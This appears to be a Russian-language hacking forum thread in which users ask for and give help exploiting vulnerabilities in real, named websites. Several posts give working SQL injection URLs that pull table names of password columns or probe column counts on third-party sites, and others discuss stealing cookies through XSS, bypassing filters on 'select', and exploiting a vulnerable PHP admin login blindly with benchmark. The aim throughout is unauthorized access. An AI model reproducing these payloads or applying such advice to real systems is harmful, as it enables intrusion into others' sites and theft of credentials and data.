Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.thechimneypot.com/newsletter.php?id=11+and+1=if(ascii(substring((select+table_name+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1),1,1))>1,1,2)--+

    Либо рядом

    http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_id=-336+union+select+1,2,3,4,table_name,6+from+information_schema.columns+where+column_name+like+0x257061737325--+
     
    1 person likes this.
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Есть сайт site.ru на этом сайте есть XSS-уязвимость. Есть субдомен - forum.site.ru, с него необходимо стырить куки. Можно?
     
  3. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Походу,тут решает переменная path в session_id,если не ошибаюсь() ).Если path=/,то куки доступны всему домену)
     
  4. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    2mailbrush
    Возможность есть только если в куках прописано чтото типа domain:.site.ru
    А так никак, так как поддомен это уже совершенно ДРУГОЙ сайт и куки там устанавливаются ДРУГИЕ
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Да, я это знаю, насчет поддоменов, просто встречались такие XSS-ки, которые работали на субдоменах.
    Вот, именно это я и хотел узнать. Такого нету... Теперь смысл понятен.
     
  6. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    41
    Reputations:
    6
    а чем это может меня порадовать и какие выводы можно из этого сделать?
    http://www.sela-shop.ru/clothes.aspx?cat=93&scat=14'
     
  7. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    думаю только раскрытие путей
     
  8. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    21
    Likes Received:
    2
    Reputations:
    1
    Есть где нибудь (поиск не помог) программка или скрипт для выдирания данных через blind иньекцию. Не слишком замороченная, просто что бы делила АСКИ диапазон пополам, потом ещё раз пополам итд... вобщем чтобы минимизировала число запросов?
     
  9. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    2farpost, вот держи:
    https://forum.antichat.ru/showpost.php?p=894169&postcount=5
     
  10. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    order by помог подобрать кол-во столбцов)
    выяснил что сервак реагирует нехорошо на слово select. показывает 500 error)
    пробовал и SeLeCt и sel/**/ect не помогает(
    с подзапросами тоже обламывается)
    какие есть варианты?)
     
  11. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    Зравсвуйте вот нашел сайтец http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&online_only=1&search=1&age_start=1'&age_end=1&country=1 помогите пожалуйста пытаюсь подобрать кол-во полей ни как ни могу перечитал все статьи по sql инъекциям.
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    1 попробовать POST
    2 дать линк
     
    1 person likes this.
  13. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2^YaHoo^
    http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&online_only=1&search=1&age_start=1)))+order+by+1000+--+&age_end=1&country=1
    дальше сам)
     
  14. gigazoid

    gigazoid New Member

    Joined:
    30 Mar 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    HI! что можно с этим сделать http://bf2.провайдер.ru/info/index.php?IP=1'&sort=points&port=29900&liteTag=something&mode=qr3&sort=points
     
    #7354 gigazoid, 3 Jun 2009
    Last edited by a moderator: 3 Jun 2009
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Даже не знаю что посоветовать.

    Попробуй так
    http://bf2.провайдер.ru/тут/типо/линк/бажный_скрипт.php?IP=1+тут+вставить+супер+пупер+ха керский+скуль+запрос+отсечь_комментарием_оставшуюс я_часть&sort=points&port=29900&liteTag=something&mode=qr3&sort=points

    Должен вывести аккаунт

    Если не выйдет , пиши, будем пробовать "Удалённо_инклудовать_файл" (с)
     
    3 people like this.
  16. gigazoid

    gigazoid New Member

    Joined:
    30 Mar 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Прикольно обязательно попробую :)
     
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Всем привет, у меня такой вопрос, можно ли как нибудь попасть в админ панель.
    Как я вижу, что авторизация проходит так: в БД ищется юзер с соответсвующем поролем из БД.
    А дальше я понять не чего не могу :)

    PHP:


    $login 
    $_GET['login'];
    $pass $_GET['p'];

    $result mysql_query("SELECT `pass` FROM `superadmin` WHERE `login`='$login';");
    $row=mysql_fetch_row($result);
    if(!empty(
    $row))
    {
     
    $truepass $row[0];
     if (
    $truepass == $pass || $truepass == md5($pass))

     {
      
    // вход осуществлен
     
    else
     {
    //неверный пароль
    break;
     }

    else
      {
      
    //неверный пароль
      
    }
    помогите пожалуйсто разобраться
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Уязвимый скрипт у тебя... SQL-инъекция там..
     
  19. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    mailbrush,можеш носом меня тыкнуть, где там уязвимость и как ей воспользоватся?
     
  20. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    2 SeNaP
    уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк
     
    #7360 Iceangel_, 3 Jun 2009
    Last edited: 3 Jun 2009
Loading...
Thread Status:
Not open for further replies.